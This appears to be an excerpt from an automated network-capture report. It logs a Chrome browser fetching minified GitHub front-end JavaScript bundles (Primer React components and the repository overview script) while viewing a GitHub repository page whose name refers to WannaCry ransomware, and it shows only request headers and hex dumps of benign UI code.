                                                                                      Data Ascii: ,n]of e.entries())if((r=r+n.width+8)>a){l=t;break}return l},W=(0,a.forwardRef)(({as:e="nav","aria-label":t,sx:n=y.P,loadingCounters:r=!1,children:d},u)=>{let h=(0,a.useRef)(null),v=null!=u?u:h,S=(0,a.useRef)(null),N=(0,a.useRef)(null),P=(0,a.useRef)(null)
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 6c 65 74 20 6e 3d 5b 2e 2e 2e 74 2c 65 5d 3b 72 65 74 75 72 6e 20 6e 7d 29 7d 2c 5b 5d 29 2c 65 69 3d 61 2e 75 73 65 43 61 6c 6c 62 61 63 6b 28 28 29 3d 3e 7b 46 28 21 31 29 7d 2c 5b 46 5d 29 2c 65 6f 3d 61 2e 75 73 65 43 61 6c 6c 62 61 63 6b 28 28 29 3d 3e 7b 76 61 72 20 65 3b 6e 75 6c 6c 3d 3d 3d 28 65 3d 50 2e 63 75 72 72 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 7c 7c 65 2e 66 6f 63 75 73 28 29 7d 2c 5b 5d 29 2c 65 73 3d 28 30 2c 61 2e 75 73 65 43 61 6c 6c 62 61 63 6b 29 28 65 3d 3e 7b 65 2e 64 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 7c 7c 30 21 3d 3d 65 2e 62 75 74 74 6f 6e 7c 7c 46 28 65 3d 3e 21 65 29 7d 2c 5b 5d 29 3b 72 65 74 75 72 6e 28 30 2c 45 2e 6f 29 28 65 3d 3e 7b 4d 26 26 28 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29
                                                                                      Data Ascii: let n=[...t,e];return n})},[]),ei=a.useCallback(()=>{F(!1)},[F]),eo=a.useCallback(()=>{var e;null===(e=P.current)||void 0===e||e.focus()},[]),es=(0,a.useCallback)(e=>{e.defaultPrevented||0!==e.button||F(e=>!e)},[]);return(0,E.o)(e=>{M&&(e.preventDefault()
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 70 73 3b 69 66 28 6f 26 26 22 66 61 6c 73 65 22 21 3d 3d 6f 29 7b 6c 65 74 20 6e 3d 6e 65 77 20 4d 6f 75 73 65 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 29 3b 65 65 7c 7c 65 6e 28 65 2c 74 2c 6e 2c 65 61 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 49 2e 53 2e 4c 69 6e 6b 49 74 65 6d 2c 4c 28 7b 6b 65 79 3a 6e 2c 73 78 3a 62 2c 6f 6e 43 6c 69 63 6b 3a 6e 3d 3e 7b 65 65 7c 7c 65 6e 28 65 2c 74 2c 6e 2c 65 61 29 2c 65 69 28 29 2c 65 6f 28 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 73 26 26 73 28 6e 29 7d 7d 2c 63 29 2c 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6c 2e 5a 2c 7b 61 73 3a 22 73 70 61 6e 22 2c 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e
                                                                                      Data Ascii: ps;if(o&&"false"!==o){let n=new MouseEvent("click");ee||en(e,t,n,ea)}return a.createElement(I.S.LinkItem,L({key:n,sx:b,onClick:n=>{ee||en(e,t,n,ea),ei(),eo(),"function"==typeof s&&s(n)}},c),a.createElement(l.Z,{as:"span",sx:{display:"flex",alignItems:"cen
                                                                                      2024-03-23 14:47:28 UTC1024INData Raw: 78 74 3a 61 2c 77 69 64 74 68 3a 65 2e 77 69 64 74 68 7d 29 2c 43 28 7b 74 65 78 74 3a 61 2c 77 69 64 74 68 3a 65 2e 77 69 64 74 68 2d 6c 7d 29 7d 7d 2c 5b 62 2c 76 2c 43 5d 29 3b 6c 65 74 20 52 3d 61 2e 75 73 65 43 61 6c 6c 62 61 63 6b 28 65 3d 3e 7b 22 20 22 21 3d 3d 65 2e 6b 65 79 26 26 22 45 6e 74 65 72 22 21 3d 3d 65 2e 6b 65 79 7c 7c 65 2e 64 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 73 7c 7c 73 28 65 29 7d 2c 5b 73 5d 29 2c 5a 3d 61 2e 75 73 65 43 61 6c 6c 62 61 63 6b 28 65 3d 3e 7b 65 2e 64 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 73 7c 7c 73 28 65 29 7d 2c 5b 73 5d 29 3b 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65
                                                                                      Data Ascii: xt:a,width:e.width}),C({text:a,width:e.width-l})}},[b,v,C]);let R=a.useCallback(e=>{" "!==e.key&&"Enter"!==e.key||e.defaultPrevented||"function"!=typeof s||s(e)},[s]),Z=a.useCallback(e=>{e.defaultPrevented||"function"!=typeof s||s(e)},[s]);return a.create


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      113192.168.2.1649819185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:27 UTC675OUTGET /assets/vendors-node_modules_primer_react_lib-esm_AvatarStack_AvatarStack_js-node_modules_primer_reac-558b50-c6ea7afb7179.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:28 UTC685INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 43632
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 21 Mar 2024 19:18:34 GMT
                                                                                      ETag: 0x8DC49DBB3BFD25B
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:27 GMT
                                                                                      Age: 75614
                                                                                      X-Served-By: cache-iad-kjyo7100159-IAD, cache-ewr18163-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 31, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: dd5170192d2b4de86ec17018f2e6a6926bcf8159
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 6d 5f 41 76 61 74 61 72 53 74 61 63 6b 5f 41 76 61 74 61 72 53 74 61 63 6b 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 2d 35 35 38 62 35 30 22 5d 2c 7b 32 36 30 31 32 3a 28 65 2c 74 2c 61 29 3d 3e 7b 61 2e 64 28 74 2c 7b 5a 3a 28 29 3d 3e 67 2c 65 3a 28 29 3d 3e 75 7d 29 3b 76 61 72 20 72 3d 61 28 36 37 32 39 34 29 2c 6f 3d 61 28 31 35 33 38 38 29 2c 69 3d 61 28 34 32 33 37 39
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_react_lib-esm_AvatarStack_AvatarStack_js-node_modules_primer_reac-558b50"],{26012:(e,t,a)=>{a.d(t,{Z:()=>g,e:()=>u});var r=a(67294),o=a(15388),i=a(42379
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 66 3d 61 28 37 32 36 31 29 2c 75 3d 61 28 39 39 39 36 29 2c 6d 3d 61 2e 6e 28 75 29 3b 6c 65 74 20 67 3d 69 2e 5a 50 2e 73 70 61 6e 2e 77 69 74 68 43 6f 6e 66 69 67 28 7b 64 69 73 70 6c 61 79 4e 61 6d 65 3a 22 41 76 61 74 61 72 53 74 61 63 6b 5f 5f 41 76 61 74 61 72 53 74 61 63 6b 57 72 61 70 70 65 72 22 2c 63 6f 6d 70 6f 6e 65 6e 74 49 64 3a 22 73 63 2d 34 70 64 67 36 76 2d 30 22 7d 29 28 5b 22 2d 2d 61 76 61 74 61 72 2d 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 31 70 78 3b 2d 2d 61 76 61 74 61 72 2d 74 77 6f 2d 6d 61 72 67 69 6e 3a 63 61 6c 63 28 76 61 72 28 2d 2d 61 76 61 74 61 72 2d 73 74 61 63 6b 2d 73 69 7a 65 29 20 2a 20 2d 30 2e 35 35 29 3b 2d 2d 61 76 61 74 61 72 2d 74 68 72 65 65 2d 6d 61 72 67 69 6e 3a 63 61 6c 63 28 76 61 72 28 2d 2d 61 76 61 74
                                                                                      Data Ascii: f=a(7261),u=a(9996),m=a.n(u);let g=i.ZP.span.withConfig({displayName:"AvatarStack__AvatarStackWrapper",componentId:"sc-4pdg6v-0"})(["--avatar-border-width:1px;--avatar-two-margin:calc(var(--avatar-stack-size) * -0.55);--avatar-three-margin:calc(var(--avat
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 74 61 63 6b 2d 73 69 7a 65 29 20 2b 20 63 61 6c 63 28 20 63 61 6c 63 28 76 61 72 28 2d 2d 61 76 61 74 61 72 2d 73 74 61 63 6b 2d 73 69 7a 65 29 20 2b 20 76 61 72 28 2d 2d 61 76 61 74 61 72 2d 74 77 6f 2d 6d 61 72 67 69 6e 29 29 20 2b 20 63 61 6c 63 28 76 61 72 28 2d 2d 61 76 61 74 61 72 2d 73 74 61 63 6b 2d 73 69 7a 65 29 20 2b 20 76 61 72 28 2d 2d 61 76 61 74 61 72 2d 74 68 72 65 65 2d 6d 61 72 67 69 6e 29 29 20 2a 20 32 20 29 20 29 3b 7d 26 2e 70 63 2d 41 76 61 74 61 72 53 74 61 63 6b 2d 2d 72 69 67 68 74 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 3b 2e 70 63 2d 41 76 61 74 61 72 49 74 65 6d 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 26 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67
                                                                                      Data Ascii: tack-size) + calc( calc(var(--avatar-stack-size) + var(--avatar-two-margin)) + calc(var(--avatar-stack-size) + var(--avatar-three-margin)) * 2 ) );}&.pc-AvatarStack--right{justify-content:flex-end;.pc-AvatarItem{margin-left:0 !important;&:first-child{marg
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 5a 29 28 7b 22 70 63 2d 41 76 61 74 61 72 53 74 61 63 6b 2d 2d 74 77 6f 22 3a 32 3d 3d 3d 73 2c 22 70 63 2d 41 76 61 74 61 72 53 74 61 63 6b 2d 2d 74 68 72 65 65 22 3a 33 3d 3d 3d 73 2c 22 70 63 2d 41 76 61 74 61 72 53 74 61 63 6b 2d 2d 74 68 72 65 65 2d 70 6c 75 73 22 3a 73 3e 33 2c 22 70 63 2d 41 76 61 74 61 72 53 74 61 63 6b 2d 2d 72 69 67 68 74 22 3a 74 7d 29 2c 62 3d 28 30 2c 72 2e 5a 29 28 22 70 63 2d 41 76 61 74 61 72 53 74 61 63 6b 42 6f 64 79 22 2c 7b 22 70 63 2d 41 76 61 74 61 72 53 74 61 63 6b 2d 2d 64 69 73 61 62 6c 65 45 78 70 61 6e 64 22 3a 61 7d 29 2c 79 3d 6d 28 29 28 69 3f 28 30 2c 64 2e 66 64 29 28 69 29 3f 28 30 2c 70 2e 58 29 28 69 2c 22 2d 2d 61 76 61 74 61 72 2d 73 74 61 63 6b 2d 73 69 7a 65 22 2c 65 3d 3e 60 24 7b 65 7c 7c 63 2e 65
                                                                                      Data Ascii: Z)({"pc-AvatarStack--two":2===s,"pc-AvatarStack--three":3===s,"pc-AvatarStack--three-plus":s>3,"pc-AvatarStack--right":t}),b=(0,r.Z)("pc-AvatarStackBody",{"pc-AvatarStack--disableExpand":a}),y=m()(i?(0,d.fd)(i)?(0,p.X)(i,"--avatar-stack-size",e=>`${e||c.e
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 68 3b 74 2b 2b 29 7b 76 61 72 20 61 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 61 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 72 29 26 26 28 65 5b 72 5d 3d 61 5b 72 5d 29 7d 72 65 74 75 72 6e 20 65 7d 29 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 6c 65 74 20 73 3d 28 30 2c 72 2e 66 6f 72 77 61 72 64 52 65 66 29 28 28 7b 73 78 3a 65 3d 69 2e 50 2c 69 63 6f 6e 3a 74 2c 2e 2e 2e 61 7d 2c 73 29 3d 3e 7b 6c 65 74 20 63 3d 65 2c 7b 73 69 7a 65 3a 64 7d 3d 61 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 65 26 26 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 2e 6c 65 6e 67 74 68 3e 30 26 26 28 63 3d 28 30 2c 6e 2e 5a 29 28 7b 73
                                                                                      Data Ascii: h;t++){var a=arguments[t];for(var r in a)Object.prototype.hasOwnProperty.call(a,r)&&(e[r]=a[r])}return e}).apply(this,arguments)}let s=(0,r.forwardRef)(({sx:e=i.P,icon:t,...a},s)=>{let c=e,{size:d}=a;return null!==e&&Object.keys(e).length>0&&(c=(0,n.Z)({s
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 74 7d 29 29 29 7d 6e 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 43 69 72 63 6c 65 4f 63 74 69 63 6f 6e 22 7d 2c 35 39 31 34 38 3a 28 65 2c 74 2c 61 29 3d 3e 7b 61 2e 64 28 74 2c 7b 56 3a 28 29 3d 3e 52 7d 29 3b 76 61 72 20 72 3d 61 28 36 37 32 39 34 29 2c 6f 3d 61 28 31 35 33 38 38 29 2c 69 3d 61 28 34 32 34 38 33 29 2c 6e 3d 61 28 31 35 31 37 33 29 2c 6c 3d 61 28 33 31 31 37 31 29 2c 73 3d 61 28 38 38 32 31 36 29 2c 63 3d 61 28 34 32 33 37 39 29 2c 64 3d 61 28 36 36 30 34 34 29 2c 70 3d 61 28 33 35 30 34 38 29 2c 66 3d 61 28 34 38 35 34 32 29 2c 75 3d 61 28 31 34 35 34 33 29 2c 6d 3d 61 28 31 36 35 34 35 29 2c 67 3d 61 28 39 38 38 33 33 29 2c 68 3d 61 28 38 35 35 32 39 29 2c 62 3d 61 28 31 37 38 34 30 29 2c 79 3d 61 28 34 31 39 30 35 29 2c 78 3d 61 28 37
                                                                                      Data Ascii: t})))}n.displayName="CircleOcticon"},59148:(e,t,a)=>{a.d(t,{V:()=>R});var r=a(67294),o=a(15388),i=a(42483),n=a(15173),l=a(31171),s=a(88216),c=a(42379),d=a(66044),p=a(35048),f=a(48542),u=a(14543),m=a(16545),g=a(98833),h=a(85529),b=a(17840),y=a(41905),x=a(7
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 6f 22 7d 2c 55 3d 7b 73 6d 61 6c 6c 3a 22 32 39 36 70 78 22 2c 6d 65 64 69 75 6d 3a 22 33 32 30 70 78 22 2c 6c 61 72 67 65 3a 22 34 38 30 70 78 22 2c 78 6c 61 72 67 65 3a 22 36 34 30 70 78 22 7d 2c 5a 3d 6f 2e 5a 50 2e 64 69 76 2e 77 69 74 68 43 6f 6e 66 69 67 28 7b 64 69 73 70 6c 61 79 4e 61 6d 65 3a 22 44 69 61 6c 6f 67 5f 5f 53 74 79 6c 65 64 44 69 61 6c 6f 67 22 2c 63 6f 6d 70 6f 6e 65 6e 74 49 64 3a 22 73 63 2d 75 61 78 6a 73 6e 2d 31 22 7d 29 28 5b 22 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 22 2c 22 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 22 2c 22 3b 77 69 64 74 68 3a 22 2c 22 3b 68 65 69 67 68 74 3a 22 2c 22 3b 6d 69 6e 2d 77 69 64 74 68
                                                                                      Data Ascii: o"},U={small:"296px",medium:"320px",large:"480px",xlarge:"640px"},Z=o.ZP.div.withConfig({displayName:"Dialog__StyledDialog",componentId:"sc-uaxjsn-1"})(["display:flex;flex-direction:column;background-color:",";box-shadow:",";width:",";height:",";min-width
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 36 37 70 78 29 7b 26 5b 64 61 74 61 2d 70 6f 73 69 74 69 6f 6e 2d 6e 61 72 72 6f 77 3d 27 63 65 6e 74 65 72 27 5d 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 76 61 72 28 2d 2d 62 6f 72 64 65 72 52 61 64 69 75 73 2d 6c 61 72 67 65 2c 30 2e 37 35 72 65 6d 29 3b 77 69 64 74 68 3a 22 2c 22 3b 68 65 69 67 68 74 3a 22 2c 22 3b 7d 26 5b 64 61 74 61 2d 70 6f 73 69 74 69 6f 6e 2d 6e 61 72 72 6f 77 3d 27 62 6f 74 74 6f 6d 27 5d 7b 77 69 64 74 68 3a 31 30 30 76 77 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 76 77 3b 6d 61 78 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 36 34 70 78 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 76 61 72 28 2d 2d 62 6f 72
                                                                                      Data Ascii: }@media (max-width:767px){&[data-position-narrow='center']{border-radius:var(--borderRadius-large,0.75rem);width:",";height:",";}&[data-position-narrow='bottom']{width:100vw;height:auto;max-width:100vw;max-height:calc(100vh - 64px);border-radius:var(--bor
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 72 65 74 75 72 6e 20 45 5b 6e 75 6c 6c 21 3d 3d 28 74 3d 65 2e 68 65 69 67 68 74 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 22 61 75 74 6f 22 5d 7d 2c 6e 2e 5a 29 2c 4e 3d 28 7b 64 69 61 6c 6f 67 4c 61 62 65 6c 49 64 3a 65 2c 74 69 74 6c 65 3a 74 2c 73 75 62 74 69 74 6c 65 3a 61 2c 64 69 61 6c 6f 67 44 65 73 63 72 69 70 74 69 6f 6e 49 64 3a 6f 2c 6f 6e 43 6c 6f 73 65 3a 6e 7d 29 3d 3e 7b 6c 65 74 20 6c 3d 28 30 2c 72 2e 75 73 65 43 61 6c 6c 62 61 63 6b 29 28 28 29 3d 3e 7b 6e 28 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 22 29 7d 2c 5b 6e 5d 29 3b 72 65 74 75 72 6e 20 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 52 2e 48 65 61 64 65 72 2c 6e 75 6c 6c 2c 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 69 2e 5a 2c 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65
                                                                                      Data Ascii: return E[null!==(t=e.height)&&void 0!==t?t:"auto"]},n.Z),N=({dialogLabelId:e,title:t,subtitle:a,dialogDescriptionId:o,onClose:n})=>{let l=(0,r.useCallback)(()=>{n("close-button")},[n]);return r.createElement(R.Header,null,r.createElement(i.Z,{display:"fle
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 2c 72 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 6c 65 74 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 7c 7c 22 22 3b 69 66 28 22 68 69 64 64 65 6e 22 21 3d 3d 65 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64 65 6e 22 2c 28 29 3d 3e 7b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 65 7d 7d 2c 5b 5d 29 3b 6c 65 74 20 41 3d 28 6e 75 6c 6c 21 3d 69 3f 69 3a 4e 29 28 49 29 2c 54 3d 28 6e 75 6c 6c 21 3d 6e 3f 6e 3a 4f 29 28 49 29 2c 4c 3d 28 6e 75 6c 6c 21 3d 73 3f 73 3a 7a 29 28 49 29 2c 52 3d 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 3f 7b 22 64 61 74 61 2d 70 6f 73 69 74 69
                                                                                      Data Ascii: ,r.useEffect(()=>{let e=document.body.style.overflow||"";if("hidden"!==e)return document.body.style.overflow="hidden",()=>{document.body.style.overflow=e}},[]);let A=(null!=i?i:N)(I),T=(null!=n?n:O)(I),L=(null!=s?s:z)(I),R="string"==typeof b?{"data-positi


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      114192.168.2.1649820185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:27 UTC589OUTGET /assets/repos-overview-4ddd2c275f25.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:28 UTC685INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 57566
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 21 Mar 2024 19:18:32 GMT
                                                                                      ETag: 0x8DC49DBB2C87EDA
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:27 GMT
                                                                                      Age: 75615
                                                                                      X-Served-By: cache-iad-kjyo7100140-IAD, cache-lga21938-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 43, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: f407e5030e07c0e627b101f0b0011b59c14dd1dd
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 72 65 70 6f 73 2d 6f 76 65 72 76 69 65 77 22 5d 2c 7b 33 31 30 37 34 3a 28 65 2c 74 2c 72 29 3d 3e 7b 76 61 72 20 6e 2c 73 3d 72 28 37 34 38 39 38 29 2c 69 3d 72 28 38 35 38 39 33 29 2c 6f 3d 72 28 36 37 32 39 34 29 2c 61 3d 72 28 34 37 36 35 38 29 2c 6c 3d 72 28 35 32 36 37 34 29 2c 63 3d 72 28 31 32 30 30 38 29 2c 64 3d 72 28 35 31 39 35 32 29 2c 75 3d 72 28 35 36 38 33 30 29 2c 68 3d 72 28 31 35 30 36 32 29 2c 70 3d 72 28 31 38 36 30 32 29 2c 6d 3d 72 28 32 31 31 29 2c 66 3d 72 28 38 36 35 32 35 29 2c 78 3d 72 28 38 31 37 30 30 29
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["repos-overview"],{31074:(e,t,r)=>{var n,s=r(74898),i=r(85893),o=r(67294),a=r(47658),l=r(52674),c=r(12008),d=r(51952),u=r(56830),h=r(15062),p=r(18602),m=r(211),f=r(86525),x=r(81700)
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 20 75 73 65 20 43 6f 64 65 73 70 61 63 65 73 2e 22 5d 7d 29 7d 29 3b 72 65 74 75 72 6e 7d 69 66 28 73 7c 7c 6c 7c 7c 21 6a 29 72 65 74 75 72 6e 3b 6c 65 74 20 72 3d 28 30 2c 69 2e 6a 73 78 73 29 28 46 2e 5a 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 22 41 6e 20 75 6e 65 78 70 65 63 74 65 64 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2e 20 50 6c 65 61 73 65 20 22 2c 28 30 2c 69 2e 6a 73 78 29 28 47 2e 5a 2c 7b 68 72 65 66 3a 5f 2c 63 68 69 6c 64 72 65 6e 3a 22 63 6f 6e 74 61 63 74 20 73 75 70 70 6f 72 74 22 7d 29 2c 22 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 22 5d 7d 29 3b 69 66 28 77 29 7b 63 28 21 30 29 3b 6c 65 74 20 65 3d 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 66 29 2c 74 3d 61 77 61 69 74 20 28 30 2c 54 2e 51 29
                                                                                      Data Ascii: use Codespaces."]})});return}if(s||l||!j)return;let r=(0,i.jsxs)(F.Z,{children:["An unexpected error occurred. Please ",(0,i.jsx)(G.Z,{href:_,children:"contact support"})," for more information."]});if(w){c(!0);let e=encodeURIComponent(f),t=await (0,T.Q)
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 61 72 65 20 75 6e 73 75 70 70 6f 72 74 65 64 20 62 79 20 43 6f 64 65 73 70 61 63 65 73 20 61 74 20 74 68 69 73 20 74 69 6d 65 2e 22 5d 7d 29 3a 6a 2e 64 69 73 61 62 6c 65 64 42 79 42 75 73 69 6e 65 73 73 3f 28 30 2c 69 2e 6a 73 78 29 28 46 2e 5a 2c 7b 63 68 69 6c 64 72 65 6e 3a 22 59 6f 75 72 20 65 6e 74 65 72 70 72 69 73 65 20 68 61 73 20 64 69 73 61 62 6c 65 64 20 43 6f 64 65 73 70 61 63 65 73 20 61 74 20 74 68 69 73 20 74 69 6d 65 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 65 6e 74 65 72 70 72 69 73 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 22 7d 29 3a 6a 2e 64 69 73 61 62 6c 65 64 42 79 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 3f 28 30 2c 69 2e 6a 73 78 29 28 46 2e
                                                                                      Data Ascii: are unsupported by Codespaces at this time."]}):j.disabledByBusiness?(0,i.jsx)(F.Z,{children:"Your enterprise has disabled Codespaces at this time. Please contact your enterprise administrator for more information."}):j.disabledByOrganization?(0,i.jsx)(F.
